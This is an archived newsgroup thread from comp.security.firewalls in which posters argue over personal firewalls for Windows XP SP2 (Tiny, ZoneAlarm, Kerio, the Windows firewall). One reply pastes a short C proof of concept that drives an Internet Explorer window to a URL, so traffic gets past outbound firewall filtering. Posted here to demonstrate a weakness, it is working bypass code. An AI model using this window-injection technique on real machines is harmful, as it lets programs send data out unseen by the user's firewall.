looking for a firewall

wondering which firewalls are compatible with windows xp home sp2 and avast
antiviris
24 answers Last reply
More about looking firewall

    "jarul" <jarul24@loft.com> wrote in message
    > wondering which firewalls are compatible with windows xp home sp2 and
    > avast
    > antiviris

    The Windows XP packet filtering FW is compatible.

    Duane :)

    jarul <jarul24@loft.com> wrote:
    > wondering which firewalls are compatible with windows xp home sp2 and avast
    > antiviris

    A good one is already with your Windows - the Windows-Firewall.

    Yours,
    VB.
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"

    In article <431a4ef1@news.uni-ulm.de>, bumens@dingens.org says...
    > jarul <jarul24@loft.com> wrote:
    > > wondering which firewalls are compatible with windows xp home sp2 and avast
    > > antiviris
    >
    > A good one is already with your Windows - the Windows-Firewall.

    He said "Firewall", that excludes Windows Sp2 and it's firewall.

    --

    spam999free@rrohio.com
    remove 999 in order to email me

    jarul wrote:
    > wondering which firewalls are compatible with windows xp home sp2 and avast
    > antiviris

    I use the free version of Kerio personal firewall with avast! and
    windows xp sp2 on my laptop.

    "jarul" <jarul24@loft.com> wrote in message
    > wondering which firewalls are compatible with windows xp home sp2 and
    avast
    > antiviris

    There is only one answer, Tiny. While it is no longer
    free, and costs $99 for the latest version, Tiny can
    do a lot more than other software firewalls. I have
    tried Zone Alarm, BlackIce, and MacAfee, but
    Tiny Firewall is the best. After trying MacAfee,
    BlackIce, and ZoneAlarm, I can see where software
    firewalls get the sterotype of "toy firewall". Tiny can
    do a LOT more. Tiny can, for example, stop Kazaa,
    where those other firewalls, and evev hardware
    appliances, cannot.

    Leythos <void@nowhere.lan> wrote:

    > He said "Firewall", that excludes Windows Sp2 and it's firewall.

    Any external firewall box should work fine :-)

    Juergen Nieveler
    --
    The side with the simplest uniforms wins.

    Charles Newman <charlesnewman1@comcast.spam-be-gon.net> wrote:
    > > wondering which firewalls are compatible with windows xp home sp2
    > There is only one answer, Tiny. While it is no longer
    > free, and costs $99 for the latest version, Tiny can
    > do a lot more than other software firewalls.

    Well, reciting <43193c98@news.uni-ulm.de>

    Tiny "Personal Firewall" does not filter all network servers in the
    standard configuration. This makes Tiny unusable for Joe Average.

    Tiny cannot prevent spyware from sending your personal information
    across the Internet; it failed in our tests together with the rest of the
    "Personal Firewalls".

    Tiny does not make a PC "invisible" or "stealth" in the Internet, as
    this is not possible at all.

    And:

    Tiny "Personal Firewall" installs SYSTEM-Services, which open
    windows.

    This is a gross error, because this breaches security. Tiny show here,
    that they never read Microsoft's design guidlines for system services:

    http://msdn.microsoft.com/libr ary/en-us/dllproc/base/interac tive_serv...

    For a software, which should enhance security, this design flow means the
    declaration of bankruptcy.

    "Volker Birk" <bumens@dingens.org> wrote in message
    > Charles Newman <charlesnewman1@comcast.spam-be-gon.net> wrote:
    > > > wondering which firewalls are compatible with windows xp home sp2
    > > There is only one answer, Tiny. While it is no longer
    > > free, and costs $99 for the latest version, Tiny can
    > > do a lot more than other software firewalls.
    >
    > Well, reciting <43193c98@news.uni-ulm.de>
    >
    > Tiny "Personal Firewall" does not filter all network servers in the
    > standard configuration. This makes Tiny unusable for Joe Average.
    >
    > Tiny cannot prevent spyware from sending your personal information
    > across the Internet; it failed in our tests together with the rest of the
    > "Personal Firewalls".
    >
    > Tiny does not make a PC "invisible" or "stealth" in the Internet, as
    > this is not possible at all.
    >
    > And:
    >
    > Tiny "Personal Firewall" installs SYSTEM-Services, which open
    > windows.
    >
    > This is a gross error, because this breaches security. Tiny show here,
    > that they never read Microsoft's design guidlines for system services:
    >
    > http://msdn.microsoft.com/libr ary/en-us/dllproc/base/interac tive_serv...
    >
    > For a software, which should enhance security, this design flow means the
    > declaration of bankruptcy.
    >
    > Yours,
    > VB.
    > --
    > "Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
    > deutschen Schlafzimmern passiert".
    > Harald Schmidt zum "Weltjugendtag"

    Tiny is the only software firewall, however, that
    can block and/or restrict outbound communications.
    The only other solution would be to buy a hardware
    appliance that would be several times the cost of
    Tiny, and would not be as flexible or customizable
    as Tiny
  9. Archived from groups: comp.security.firewalls (More info?)

    In article <o7mdnULx4YRSrobeRVn-3g@comcast.com>, charlesnewman1
    @comcast.spam-be-gon.net says...

    > "Volker Birk" <bumens@dingens.org> wrote in message
    > > > There is only one answer, Tiny. While it is no longer
    > > > free, and costs $99 for the latest version, Tiny can
    > > > do a lot more than other software firewalls.
    > >
    > > Well, reciting <43193c98@news.uni-ulm.de>
    > >
    > > Tiny "Personal Firewall" does not filter all network servers in the
    > > standard configuration. This makes Tiny unusable for Joe Average.
    > >
    > > Tiny cannot prevent spyware from sending your personal information
    > > across the Internet; it failed in our tests together with the rest of the
    > > "Personal Firewalls".
    > >
    > > Tiny does not make a PC "invisible" or "stealth" in the Internet, as
    > > this is not possible at all.
    > >
    > > And:
    > >
    > > Tiny "Personal Firewall" installs SYSTEM-Services, which open
    > > windows.
    > >
    > > This is a gross error, because this breaches security. Tiny show here,
    > > that they never read Microsoft's design guidlines for system services:
    > >
    > > http://msdn.microsoft.com/libr ary/en-us/dllproc/base/interac tive_serv...
    > >
    > > For a software, which should enhance security, this design flow means the
    > > declaration of bankruptcy.
    > >
    > > Yours,
    > > VB.
    > > --
    > > "Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
    > > deutschen Schlafzimmern passiert".
    > > Harald Schmidt zum "Weltjugendtag"
    >
    > Tiny is the only software firewall, however, that
    > can block and/or restrict outbound communications.
    > The only other solution would be to buy a hardware
    > appliance that would be several times the cost of
    > Tiny, and would not be as flexible or customizable
    > as Tiny

    ZoneAlarm can do the same and it's easier for novices to understand.

    --

    spam999free@rrohio.com
    remove 999 in order to email me
  10. Archived from groups: comp.security.firewalls (More info?)

    > In article <o7mdnULx4YRSrobeRVn-3g@comcast.com>, charlesnewman1
    > @comcast.spam-be-gon.net says...
    > >
    > > "Volker Birk" <bumens@dingens.org> wrote in message
    > > >
    > > > Well, reciting <43193c98@news.uni-ulm.de>
    > > >
    > > > Tiny "Personal Firewall" does not filter all network servers in the
    > > > standard configuration. This makes Tiny unusable for Joe Average.
    > > >
    > > > Tiny cannot prevent spyware from sending your personal information
    > > > across the Internet; it failed in our tests together with the rest of
    the
    > > > "Personal Firewalls".
    > > >
    > > > Tiny does not make a PC "invisible" or "stealth" in the Internet, as
    > > > this is not possible at all.
    > > >
    > > > And:
    > > >
    > > > Tiny "Personal Firewall" installs SYSTEM-Services, which open
    > > > windows.
    > > >
    > > > This is a gross error, because this breaches security. Tiny show here,
    > > > that they never read Microsoft's design guidlines for system services:
    > > >
    > > > http://msdn.microsoft.com/libr ary/en-us/dllproc/base/interac
    tive_serv...

    > > > For a software, which should enhance security, this design flow means
    the
    > > > declaration of bankruptcy.
    > > >
    > > > Yours,
    > > > VB.
    > > > --
    > > > "Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
    > > > deutschen Schlafzimmern passiert".
    > > > Harald Schmidt zum "Weltjugendtag"
    > >
    > > Tiny is the only software firewall, however, that
    > > can block and/or restrict outbound communications.
    > > The only other solution would be to buy a hardware
    > > appliance that would be several times the cost of
    > > Tiny, and would not be as flexible or customizable
    > > as Tiny
    >
    > ZoneAlarm can do the same and it's easier for novices to understand.

    The trouble with ZoneAlarm, as with MacAfee
    and BlackIce, is that they only protect against
    inbound connections, and are not very customizable
    to your needs. With Tiny, I can restrict which
    applications on my NAT box can go where.
    You cannot do that with ZoneAlarm, MacAfee,
    or BlackIce. If you are serious about security, and
    dont want to spend hundreds of dollars on a
    hardware appliance, then Tiny is your best bet.
    At the $99 they are now charging, it would be
    well worth the price. You can get something that
    is just as good as, if not better than, a hardware
    appliance, for a fraction of the price. The $99
    professional version can also implement filtering
    rules by specific user. That is something that
    ZoneAlarm, MacAfee, and BlackIce cannot do.
    Not even hardware appliances have learnd that
    one yet.
    Tiny can also instanly notify you of any
    attempted activity not in the ruleset, so you can
    decide whether to ban or allow it in the future.
    This is something the other software firewalls,
    as well as hardware appliances, have not learned
    yet.
  11. Archived from groups: comp.security.firewalls (More info?)

    In article <ct6dnY9x3v0Aw4beRVn-sw@comcast.com>, charlesnewman1
    @spamfilter.home.comcast.net says...
    > The trouble with ZoneAlarm, as with MacAfee
    > and BlackIce, is that they only protect against
    > inbound connections, and are not very customizable
    > to your needs. With Tiny, I can restrict which
    > applications on my NAT box can go where.
    > You cannot do that with ZoneAlarm,

    You should look at ZA again, I had no trouble limiting applications from
    using the Internet or from doing much of anything with ZA.

    --

    spam999free@rrohio.com
    remove 999 in order to email me
  12. Archived from groups: comp.security.firewalls (More info?)

    > In article <ct6dnY9x3v0Aw4beRVn-sw@comcast.com>, charlesnewman1
    > @spamfilter.home.comcast.net says...
    > > The trouble with ZoneAlarm, as with MacAfee
    > > and BlackIce, is that they only protect against
    > > inbound connections, and are not very customizable
    > > to your needs. With Tiny, I can restrict which
    > > applications on my NAT box can go where.
    > > You cannot do that with ZoneAlarm,
    >
    > You should look at ZA again, I had no trouble limiting applications from
    > using the Internet or from doing much of anything with ZA.

    However, if you want to use a software firewall
    for a network enviroment, Tiny is the way to go.
    Tiny can stop a lot of other things the other software
    firewalls, as well as hardware appliances, can't. Tiny
    is the only firewall, software or hardware, that can
    stop Kazaa, without disturupting your other traffic.
    Given the ports to have to block to stop Grokster
    and Kazaa, Tiny is the only firewall that can
    successfully block Kazaa without blocking other
    applications. I just simply use two different programs
    for the HTTP and Socks proxies on my network.
    Tiny is configured to block port 80 and ports
    1000-5300 on the Socks proxy, while the HTTP
    proxy is allowed to use those ports. I recently
    tested that with the latest version of Kazaa, and
    they have not, as of the latest release, expanded
    the number of ports the program tries, so blocking
    beyond 5300, to block Kazaa, it not necessary
    at this time.
  13. Archived from groups: comp.security.firewalls (More info?)

    Charles Newman <charlesnewman1@comcast.spam-be-gon.net> wrote:
    > Tiny is the only software firewall, however, that
    > can block and/or restrict outbound communications.

    In our test, it failed, together with the other "Personal Firewalls".
    A POC for this you can find here: http://www.dingens.org/breakout.c

    Yours,
    VB.
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"
  14. Archived from groups: comp.security.firewalls (More info?)

    Tiny and Kazza --- Kazza and Tiny --- Tiny and Kazza on the machine
    *together* in the Sun set somewhere --- please, please, please Newman
    you are killing us with this. What is it with you and your obsession with
    Tiny and Kazza?

    Duane :)
  15. Archived from groups: comp.security.firewalls (More info?)

    > Charles Newman <charlesnewman1@comcast.spam-be-gon.net> wrote:
    > > Tiny is the only software firewall, however, that
    > > can block and/or restrict outbound communications.
    >
    > In our test, it failed, together with the other "Personal
    Firewalls".
    > A POC for this you can find here: http://www.dingens.org/breakout.c
    >
    > Yours,
    > VB.

    We're supposed to download a file from a stranger in a newsgroup? No
    thanks, VB. I'll just have to remain unenlightened!

    charlie R
  16. Archived from groups: comp.security.firewalls (More info?)

    personaly i think the windows firewall is not very good.

    there are better (free) options out there:
    ZA,kerio or Sygate.

    JJ

    Volker Birk wrote:
    > jarul <jarul24@loft.com> wrote:
    >
    >>wondering which firewalls are compatible with windows xp home sp2 and avast
    >>antiviris
    >

    > A good one is already with your Windows - the Windows-Firewall.
    >
    > Yours,
    > VB.
  17. Archived from groups: comp.security.firewalls (More info?)

    Tiny is imho NOT very suiteble for beginners.
    Even for advanced computer users it is not very easy to setu up Tiny.

    JJ

    Charles Newman wrote:
    > "jarul" <jarul24@loft.com> wrote in message
    >
    >>wondering which firewalls are compatible with windows xp home sp2 and
    >
    > avast
    >
    >>antiviris
    >

    > There is only one answer, Tiny. While it is no longer
    > free, and costs $99 for the latest version, Tiny can
    > do a lot more than other software firewalls. I have
    > tried Zone Alarm, BlackIce, and MacAfee, but
    > Tiny Firewall is the best. After trying MacAfee,
    > BlackIce, and ZoneAlarm, I can see where software
    > firewalls get the sterotype of "toy firewall". Tiny can
    > do a LOT more. Tiny can, for example, stop Kazaa,
    > where those other firewalls, and evev hardware
    > appliances, cannot.

  18. Archived from groups: comp.security.firewalls (More info?)

    the new kerio 4.2 can do that also.

    JJ

    Leythos wrote:
    > In article <o7mdnULx4YRSrobeRVn-3g@comcast.com>, charlesnewman1
    > @comcast.spam-be-gon.net says...
    >
    >>"Volker Birk" <bumens@dingens.org> wrote in message

    >>>Well, reciting <43193c98@news.uni-ulm.de>
    >>>
    >>>Tiny "Personal Firewall" does not filter all network servers in the
    >>>standard configuration. This makes Tiny unusable for Joe Average.
    >>>
    >>>Tiny cannot prevent spyware from sending your personal information
    >>>across the Internet; it failed in our tests together with the rest of the
    >>>"Personal Firewalls".
    >>>
    >>>Tiny does not make a PC "invisible" or "stealth" in the Internet, as
    >>>this is not possible at all.
    >>>
    >>>And:
    >>>
    >>>Tiny "Personal Firewall" installs SYSTEM-Services, which open
    >>>windows.
    >>>
    >>>This is a gross error, because this breaches security. Tiny show here,
    >>>that they never read Microsoft's design guidlines for system services:
    >>>
    >>>http://msdn.microsoft.com/libr ary/en-us/dllproc/base/interac tive_serv...
    >>>
    >>>For a software, which should enhance security, this design flow means the
    >>>declaration of bankruptcy.
    >>>
    >>>Yours,
    >>>VB.
    >>>--
    >>>"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
    >>>deutschen Schlafzimmern passiert".
    >>> Harald Schmidt zum "Weltjugendtag"
    >>
    >> Tiny is the only software firewall, however, that
    >>can block and/or restrict outbound communications.
    >>The only other solution would be to buy a hardware
    >>appliance that would be several times the cost of
    >>Tiny, and would not be as flexible or customizable
    >>as Tiny
    >

    > ZoneAlarm can do the same and it's easier for novices to understand.

  19. Archived from groups: comp.security.firewalls (More info?)

    J007 <JJnospamplease007@dse.nl> wrote:
    > personaly i think the windows firewall is not very good.

    Why?

    > there are better (free) options out there:
    > ZA,kerio or Sygate.

    I know much things, those are doing worse than the Windows-Firewall,
    but nothing, which is better. Please explain.

    Yours,
    VB.
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"
  20. Archived from groups: comp.security.firewalls (More info?)

    charlie R <welpctSKIPME@psci.net> wrote:
    > > A POC for this you can find here: http://www.dingens.org/breakout.c
    > We're supposed to download a file from a stranger in a newsgroup? No
    > thanks, VB. I'll just have to remain unenlightened!

    I already pasted the content here. But for you, I'll repeat ;-)

    ---------------------------- snip ------------------------------------------
    #include <windows.h>

    int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine,
    int nCmdShow)
    {
    HWND ie = FindWindowEx(NULL, NULL, "IEFrame", NULL);
    HWND wrk, tb, cbx, cb, url;

    if (ie == NULL) {
    MessageBox(NULL, "Mach einen IE auf für diesen Test, sonst"
    "komm ich noch auf die Idee, und mach selber einen"
    "auf ;-)", "Huhu!", MB_OK | MB_ICONEXCLAMATION);

    return 0;
    }

    wrk = FindWindowEx(ie, NULL, "WorkerW", NULL);
    tb = FindWindowEx(wrk, NULL, "ReBarWindow32", NULL);
    cbx = FindWindowEx(tb, NULL, "ComboBoxEx32", NULL);
    cb = FindWindowEx(cbx, NULL, "ComboBox", NULL);
    url = FindWindowEx(cb, NULL, "Edit", NULL);

    SendMessage(url, WM_SETTEXT, NULL, "http://www.dingens.org/breakout.html");
    PostMessage(url, WM_SETFOCUS, 0, 0);
    PostMessage(url, WM_KEYDOWN, VK_RETURN, 0);
    return 0;
    }
    ---------------------------- snap ------------------------------------------

    Yours,
    VB.
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"
  21. Archived from groups: comp.security.firewalls (More info?)

    Charles Newman <charlesnewman1@comcast.nospam.net> wrote:
    > This freeware program is
    > just simply the BEST tool for managing Usenet,
    > on your network.

    Beside an own newsserver.

    Yours,
    VB.
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"
  22. Archived from groups: comp.security.firewalls (More info?)

    > Charles Newman <charlesnewman1@comcast.nospam.net> wrote:
    >> This freeware program is
    >> just simply the BEST tool for managing Usenet,
    >> on your network.
    >
    > Beside an own newsserver.

    Even if you have your own news server, you NEED
    this program. Having this program sit between your
    news server and your network, lets you filter out
    things you dont want on your network.
  23. Archived from groups: comp.security.firewalls (More info?)

    In article <JKKdnavJDNyq6YLeRVn-1A@comcast.com>, charlesnewman1
    @comcast.nospam.net says...

    > "Volker Birk" <bumens@dingens.org> wrote in message
    > > Charles Newman <charlesnewman1@comcast.nospam.net> wrote:
    > >> This freeware program is
    > >> just simply the BEST tool for managing Usenet,
    > >> on your network.
    > >
    > > Beside an own newsserver.
    >
    > Even if you have your own news server, you NEED
    > this program. Having this program sit between your
    > news server and your network, lets you filter out
    > things you dont want on your network.

    To bad we can't filter posts by clueless hacks that don't understand
    networking, security, or basics of content.

    --

    spam999free@rrohio.com
    remove 999 in order to email me
  24. Archived from groups: comp.security.firewalls (More info?)

    Charles Newman <charlesnewman1@comcast.nospam.net> wrote:
    > "Volker Birk" <bumens@dingens.org> wrote in message
    > > Charles Newman <charlesnewman1@comcast.nospam.net> wrote:
    > >> This freeware program is
    > >> just simply the BEST tool for managing Usenet,
    > >> on your network.
    > > Beside an own newsserver.
    > Even if you have your own news server, you NEED
    > this program.

    I cannot see that.

    > Having this program sit between your
    > news server and your network, lets you filter out
    > things you dont want on your network.

    This is done by subscribing hierarchies with the news-server.

    Yours,
    VB.
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"

Firewalls Security Windows XP Compatibility Networking Product